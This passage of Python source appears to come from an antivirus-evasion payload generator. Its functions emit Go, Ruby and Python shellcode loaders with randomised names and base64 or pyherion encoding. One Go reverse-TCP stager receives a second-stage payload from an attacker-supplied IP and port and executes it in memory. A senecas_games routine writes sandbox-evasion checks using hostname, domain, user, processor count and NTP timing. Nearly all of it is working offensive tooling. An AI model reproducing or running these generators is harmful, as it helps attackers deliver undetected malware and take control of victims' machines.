0x2000\n" % (memReserve) payload_code += "%s = 0x40\n)\n" % (pageExecRW) payload_code += "var (\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" % ( kernel32) payload_code += "%s = %s.NewProc(\"VirtualAlloc\")\n)\n" % ( procVirtualAlloc, kernel32) payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % ( cust_func, size) payload_code += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" % ( allocvarout, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW) payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % ( allocvarout, err, allocvarout) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += kernel32 + " = syscall.NewLazyDLL(\"kernel32.dll\")\n" payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n" payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n" payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % ( cust_func, size) payload_code += heapcreateout + ", _, " + errorvariable + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n" payload_code += allocvarout + ", _, " + errorvariabledos + " := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n" payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % ( allocvarout, err, allocvarout) payload_code += "func main() {\n" # Sandbox code goes here if sandbox_checks != '': payload_code += sandbox_checks payload_code += "const %s = 1000 << 10\n" % (constSize) payload_code += "var %s syscall.WSAData\n" % (wsadata) payload_code += "syscall.WSAStartup(uint32(0x202), &%s)\n" % (wsadata) payload_code += "%s, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)\n" % ( socket) payload_code += "%s := syscall.SockaddrInet4{Port: %s, Addr: [4]byte{%s, %s, %s, %s}}\n" % ( socketAddr, self.required_options["LPORT"][0], ip[0], ip[1], ip[2], ip[3]) payload_code += "syscall.Connect(%s, &%s)\n" % (socket, socketAddr) payload_code += "var %s [4]byte\n" % (buf) payload_code += "%s := syscall.WSABuf{Len: uint32(4), Buf: &%s[0]}\n" % ( dataBuf, buf) payload_code += "%s := uint32(0)\n" % (flags) payload_code += "%s := uint32(0)\n" % (qty) payload_code += "syscall.WSARecv(%s, &%s, 1, &%s, &%s, nil, nil)\n" % ( socket, dataBuf, qty, flags) payload_code += "%s := binary.LittleEndian.Uint32(%s[:])\n" % ( scLength, buf) payload_code += "%s := make([]byte, %s)\n" % (sc, scLength) payload_code += "var %s []byte\n" % (sc2) payload_code += "%s = syscall.WSABuf{Len: %s, Buf: &%s[0]}\n" % ( dataBuf, scLength, sc) payload_code += "%s = uint32(0)\n" % (flags) payload_code += "%s = uint32(0)\n" % (qty) payload_code += "%s := uint32(0)\n" % (total) payload_code += "for %s < %s {\n" % (total, scLength) payload_code += "syscall.WSARecv(%s, &%s, 1, &%s, &%s, nil, nil)\n" % ( socket, dataBuf, qty, flags) payload_code += "for i := 0; i < int(%s); i++ {\n" % (qty) payload_code += "%s = append(%s, %s[i])\n}\n%s += %s\n}\n" % ( sc2, sc2, sc, total, qty) payload_code += "%s, _ := %s(uintptr(%s + 5))\n" % (mem, cust_func, scLength) payload_code += "%s := (*[%s]byte)(unsafe.Pointer(%s))\n" % ( buffer_variable, constSize, mem) payload_code += "%s := (uintptr)(unsafe.Pointer(%s))\n" % (handle, socket) payload_code += "%s[0] = 0xBF\n" % (buffer_variable) payload_code += "%s[1] = byte(%s)\n" % (buffer_variable, handle) payload_code += "%s[2] = 0x00\n" % (buffer_variable) payload_code += "%s[3] = 0x00\n" % (buffer_variable) payload_code += "%s[4] = 0x00\n" % (buffer_variable) payload_code += "for %s, %s := range %s {\n" % (x, value, sc2) payload_code += "%s[%s+5] = %s\n}\n" % (buffer_variable, x, value) payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (mem) payload_code += '}' * num_curlys self.payload_source_code = payload_code return
def generate(self): payload_code = "require 'rubygems'\n" payload_code += "require 'win32/api'\n" payload_code += "include Win32\n" # Add logic for adding this line, stupid bug and I have no idea # why this is even a problem, but ruby is dumb if self.required_options["EXPIRE_PAYLOAD"][ 0] != "X" or self.required_options["HOSTNAME"][ 0] != "X" or self.required_options["DOMAIN"][ 0] != "X" or self.required_options["USERNAME"][ 0] != "X": pass else: payload_code += "exit if Object.const_defined?(:Ocra)\n" # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode payload_code, num_ends_required = gamemaker.senecas_games(self) # randomly generate out variable names payloadName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() threadName = evasion_helpers.randomString() heap_name = evasion_helpers.randomString() valloc_random = evasion_helpers.randomString() rtlmove_random = evasion_helpers.randomString() createthread_random = evasion_helpers.randomString() waitfor_random = evasion_helpers.randomString() heapcreate_random = evasion_helpers.randomString() heapalloc_random = evasion_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" payload_code += "%s = \"%s\"\n" % (payloadName, Shellcode) payload_code += ptrName + " = " + valloc_random + ".call(0,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0x1000, 0x40)\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += heapcreate_random + " = API.new('HeapCreate', 'III', 'I');" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" payload_code += "%s = \"%s\"\n" % (payloadName, Shellcode) payload_code += heap_name + " = " + heapcreate_random + ".call(0x0004,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0)\n" payload_code += ptrName + " = " + heapalloc_random + ".call(" + heap_name + ", 0x00000008, " + payloadName + ".length)\n" payload_code += "x = " + rtlmove_random + ".call(" + ptrName + "," + payloadName + "," + payloadName + ".length); " + threadName + " = " + createthread_random + ".call(0,0," + ptrName + ",0,0,0); x = " + waitfor_random + ".call(" + threadName + ",0xFFFFFFF)\n" # Close out all the if statements for iteration in range(num_ends_required): payload_code += 'end\n' self.payload_source_code = payload_code return
def generate(self): # randomly generate out variable names memCommit = evasion_helpers.randomString() memReserve = evasion_helpers.randomString() pageExecRW = evasion_helpers.randomString() kernel32 = evasion_helpers.randomString() procVirtualAlloc = evasion_helpers.randomString() cust_func = evasion_helpers.randomString() size = evasion_helpers.randomString() addr = evasion_helpers.randomString() err = evasion_helpers.randomString() shellcode_variable = evasion_helpers.randomString() buff = evasion_helpers.randomString() value = evasion_helpers.randomString() heapcreatevariable = evasion_helpers.randomString() heapallocvariable = evasion_helpers.randomString() heapcreateout = evasion_helpers.randomString() errorvariable = evasion_helpers.randomString() heapallocout = evasion_helpers.randomString() rand_var = evasion_helpers.randomString() procVirtualProtect = evasion_helpers.randomString() proc_out = evasion_helpers.randomString() vprotectendvar = evasion_helpers.randomString() # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # sandbox check code sandbox_checks, num_curlys = gamemaker.senecas_games(self) payload_code = "package main\nimport (\n\"syscall\"\n\"unsafe\"\n\"fmt\"\n\"os\"\n" if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += "\"runtime\"\n" # Add in other imports based on checks being performed if self.required_options["USERNAME"][0].lower() != "x": payload_code += "\"strings\"\n\"os/user\"\n" if self.required_options["HOSTNAME"][0].lower( ) != "x" or self.required_options["PROCCHECK"][0].lower() != 'false': if "strings" not in payload_code: payload_code += "\"strings\"\n" if self.required_options["SLEEP"][0].lower() != "x": payload_code += "\"net\"\n\"time\"\n\"encoding/binary\"\n" if self.required_options["BADMACS"][0].lower() != 'false': if "net" not in payload_code: payload_code += "\"net\"\n" if "strings" not in payload_code: payload_code += "\"strings\"\n" if self.required_options["UTCCHECK"][0].lower() != 'false': if "time" not in payload_code: payload_code += "\"time\"\n" if self.required_options["CURSORCHECK"][0].lower() != 'false': if "time" not in payload_code: payload_code += "\"time\"\n" payload_code += ")\n" # Changes based on injection type if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "const (\n" payload_code += "%s = 0x1000\n" % (memCommit) payload_code += "%s = 0x2000\n" % (memReserve) payload_code += "%s = 0x04\n)\n" % (pageExecRW) payload_code += "var (\n" # injection type if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "%s = 0\n" % (proc_out) payload_code += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" % ( kernel32) payload_code += "%s = %s.NewProc(\"VirtualAlloc\")\n" % ( procVirtualAlloc, kernel32) payload_code += "%s = %s.NewProc(\"VirtualProtect\")\n)\n" % ( procVirtualProtect, kernel32) payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % ( cust_func, size) payload_code += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" % ( addr, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW) payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % ( addr, err, addr) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += kernel32 + " = syscall.NewLazyDLL(\"kernel32.dll\")\n" payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n" payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n" payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % ( cust_func, size) payload_code += heapcreateout + ", _, " + errorvariable + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n" payload_code += heapallocout + ", _, _ := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n" payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % ( heapallocout, errorvariable, heapallocout) payload_code += "var %s string = \"%s\"\n" % (shellcode_variable, Shellcode) payload_code += "func main() {\n" # Sandbox code goes here if sandbox_checks != '': payload_code += sandbox_checks if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "%s, %s := %s(uintptr(len(%s)))\n" % ( addr, err, cust_func, shellcode_variable) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "%s, %s := %s(uintptr(len(%s)))\n" % ( heapallocout, err, cust_func, shellcode_variable) payload_code += "if %s != nil {\nfmt.Println(%s)\nos.Exit(1)\n}\n" % ( err, err) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" % ( buff, addr) payload_code += "var %s uintptr\n" % (proc_out) payload_code += "var %s uintptr\n" % (vprotectendvar) payload_code += "for " + rand_var + ", %s := range []byte(%s) {\n" % ( value, shellcode_variable) payload_code += buff + "[" + rand_var + "] = %s\n}\n" % (value) payload_code += "%s, _, %s = %s.Call(%s, uintptr(len(%s)), 0x20, uintptr(unsafe.Pointer(&%s)))\n" % ( proc_out, err, procVirtualProtect, addr, shellcode_variable, vprotectendvar) payload_code += "if %s == 0 {\nos.Exit(1)\n}\n" % (proc_out) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" % ( buff, heapallocout) payload_code += "for " + rand_var + ", %s := range []byte(%s) {\n" % ( value, shellcode_variable) payload_code += buff + "[" + rand_var + "] = %s\n}\n" % (value) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (addr) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % ( heapallocout) payload_code += '}' * num_curlys self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = Shellcode.encode('latin-1') Shellcode = Shellcode.decode('unicode_escape') # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # Generate Random Variable Names ShellcodeVariableName = evasion_helpers.randomString() RandPtr = evasion_helpers.randomString() RandHt = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() num_tabs_required = 0 payload_code = '' if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() todaysdate = date.today() expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Create Payload code payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n' payload_code += '\t' * num_tabs_required + 'from datetime import date\n' payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n' payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import platform\n' payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n' payload_code += '\t' * num_tabs_required + 'if ' + rand_hostname + ' in \"' + self.required_options[ "HOSTNAME"][0] + '\":\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import socket\n' payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n' payload_code += '\t' * num_tabs_required + 'if ' + rand_domain + ' in \"' + self.required_options[ "DOMAIN"][0] + '\":\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["PROCESSORS"][0].lower() != "x": rand_processor_count = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import multiprocessing\n' payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n' payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[ "PROCESSORS"][0] + ':\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import getpass\n' payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n' payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[ "USERNAME"][ 0] + '\'.lower() in ' + rand_user_name + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n' payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def senecas_games(evasion_payload): # Start checks to determine language # Define original values of variables num_tabs_required = 0 check_code = '' if evasion_payload.language == 'python': if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(evasion_payload.required_options["EXPIRE_PAYLOAD"][0]))) # Create Payload code check_code += '\t' * num_tabs_required + 'from datetime import datetime\n' check_code += '\t' * num_tabs_required + 'from datetime import date\n' check_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n' check_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' check_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import platform\n' check_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n' check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options["HOSTNAME"][0].lower() + '\" in ' + rand_hostname + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import socket\n' check_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n' check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options["DOMAIN"][0].lower() + '\" in ' + rand_domain + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": rand_processor_count = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import multiprocessing\n' check_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n' check_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + evasion_payload.required_options["PROCESSORS"][0] + ':\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import getpass\n' check_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n' check_code += '\t' * num_tabs_required + 'if \'' + evasion_payload.required_options["USERNAME"][0].lower() + '\' in ' + rand_user_name + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": rand_time_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'from time import sleep\n' check_code += '\t' * num_tabs_required + 'from socket import AF_INET, SOCK_DGRAM\n' check_code += '\t' * num_tabs_required + 'import sys\n' check_code += '\t' * num_tabs_required + 'import datetime\n' check_code += '\t' * num_tabs_required + 'import time\n' check_code += '\t' * num_tabs_required + 'import socket\n' check_code += '\t' * num_tabs_required + 'import struct\n' check_code += '\t' * num_tabs_required + 'client = socket.socket(AF_INET, SOCK_DGRAM)\n' check_code += '\t' * num_tabs_required + 'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n' check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n' check_code += '\t' * num_tabs_required + rand_time_name + ' = datetime.datetime.fromtimestamp(struct.unpack("!12I",msg)[10] - 2208988800)\n' check_code += '\t' * num_tabs_required + 'sleep(' + evasion_payload.required_options["SLEEP"][0] + ')\n' check_code += '\t' * num_tabs_required + 'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n' check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n' check_code += '\t' * num_tabs_required + 'if ((datetime.datetime.fromtimestamp((struct.unpack("!12I",msg)[10] - 2208988800)) - ' + rand_time_name + ').seconds >= ' + evasion_payload.required_options["SLEEP"][0] + '):\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'ruby': if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += 'require \'socket\'\n' check_code += 'hostname = Socket.gethostname.downcase\n' check_code += 'if hostname[\"' + evasion_payload.required_options["HOSTNAME"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code += 'require \'socket\'\n' check_code += 'domain = Socket.gethostname.downcase\n' check_code += 'if domain[\"' + evasion_payload.required_options["DOMAIN"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += 'name = ENV["USERNAME"].downcase\n' check_code += 'if name[\"' + evasion_payload.required_options["USERNAME"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": check_code += 'require \'socket\'\n' check_code += 'ntp_msg = (["00011011"] + Array.new(47,1)).pack("B8 C47")\n' check_code += 'sock = UDPSocket.new;sock.connect("us.pool.ntp.org", 123);sock.print ntp_msg;sock.flush;data,_ = sock.recvfrom(960);sock.close\n' check_code += 'firstTime = Time.at(data.unpack("B319 B32 B32")[1].to_i(2) - 2208988800)\n' check_code += 'sleep(' + evasion_payload.required_options["SLEEP"][0] + ')\n' check_code += 'sock = UDPSocket.new;sock.connect("us.pool.ntp.org", 123);sock.print ntp_msg;sock.flush;data,_ = sock.recvfrom(960)\n' check_code += 'if (Time.at(data.unpack("B319 B32 B32")[1].to_i(2) - 2208988800) - firstTime >= ' + evasion_payload.required_options["SLEEP"][0] + ')\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'perl': if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'Use Sys::Hostname;\n' check_code += '\t' * num_tabs_required + 'my $' + rand_hostname + ' = hostname;\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_hostname + '), lc(' + evasion_payload.required_options["HOSTNAME"][0] + ')) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'my $' + rand_name + ' = Win32::LoginName;\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_name + '), lc(\"' + evasion_payload.required_options["USERNAME"][0] + '\")) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'use Net::Domain qw (hostdomain);\n' check_code += '\t' * num_tabs_required + 'my $' + rand_domain + ' = hostdomain();\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_domain + '), lc(\"' + evasion_payload.required_options["DOMAIN"][0] + '\")) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": rand_corecount = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'my $' + rand_corecount + ' = $ENV{\"NUMBER_OF_PROCESSORS\"};' check_code += '\t' * num_tabs_required + 'if ($' + rand_corecount + ' >= '+ evasion_payload.required_options["PROCESSORS"][0] + '){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'use IO::Socket;' check_code += '\t' * num_tabs_required + 'my $firstTime;my $secondTime;my $sock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n' check_code += '\t' * num_tabs_required + 'my $NTPTransmit = pack("B384", "00100011", (0)x14);my $secondTransmit = pack("B384", "00100011", (0)x14);\n' check_code += '\t' * num_tabs_required + '$sock->send($NTPTransmit);$sock->recv($NTPTransmit, 384);my ($Ignore, $firstTime, $Ignore2)=unpack("B319 N B32",$NTPTransmit);$firstTime -= 2208988800;$sock->close;\n' check_code += '\t' * num_tabs_required + 'sleep ' + evasion_payload.required_options["SLEEP"][0] + ';\n' check_code += '\t' * num_tabs_required + 'my $newSock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n' check_code += '\t' * num_tabs_required + '$newSock->send($secondTransmit);$newSock->recv($secondTransmit, 384);my ($Ignore, $secondTime, $Ignore2)=unpack("B319 N B32",$secondTransmit);$newSock->close;\n' check_code += '\t' * num_tabs_required + 'my $newSock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n' check_code += '\t' * num_tabs_required + 'if ((($secondTime - 2208988800) - $firstTime) >= ' + evasion_payload.required_options["SLEEP"][0] + ') {\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'powershell': if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += "if($env:computername -eq \"" + evasion_payload.required_options["HOSTNAME"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code += "if((Get-WMIObject -Class Win32_ComputerSystem).Domain -eq \"" + evasion_payload.required_options["DOMAIN"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += "if($env:username -eq \"" + evasion_payload.required_options["USERNAME"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += "if((Get-WMIObject -Class Win32_Processor).NumberOfLogicalProcessors -ge " + evasion_payload.required_options["PROCESSORS"][0].lower() + ") {\n" num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": check_code += "[Byte[]]$NTPTransmit=,1*48;$NTPTransmit[0]=0x1B;[Byte[]]$secondTransmit=,1*48;$secondTransmit[0]=0x1B;$noAccess=$false;" check_code += "Try{$Socket=New-Object Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp);$Socket.Connect('us.pool.ntp.org',123);[Void]$Socket.Send($NTPTransmit);[Void]$Socket.Receive($NTPTransmit)}catch{$noAccess=$true};" check_code += "$runTotal=0;ForEach($Index in $NTPTransmit[40..43]){$runTotal=$runTotal*256+$Index};$firstTime=(New-Object DateTime(1900,1,1,0,0,0,[DateTimeKind]::Utc)).AddMilliseconds([UInt64]($runTotal*1000)).Second;" check_code += "Start-Sleep -s " + evasion_payload.required_options["SLEEP"][0] + ";" check_code += "Try{$NewSock=New-Object Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp);$NewSock.Connect('us.pool.ntp.org',123);[Void]$NewSock.Send($secondTransmit);[Void]$NewSock.Receive($secondTransmit);$NewSock.Close()}catch{$noAccess=$true};" check_code += "$runTotal=0;ForEach($Index in $secondTransmit[40..43]){$runTotal=$runTotal*256+$Index}\n" check_code += "if 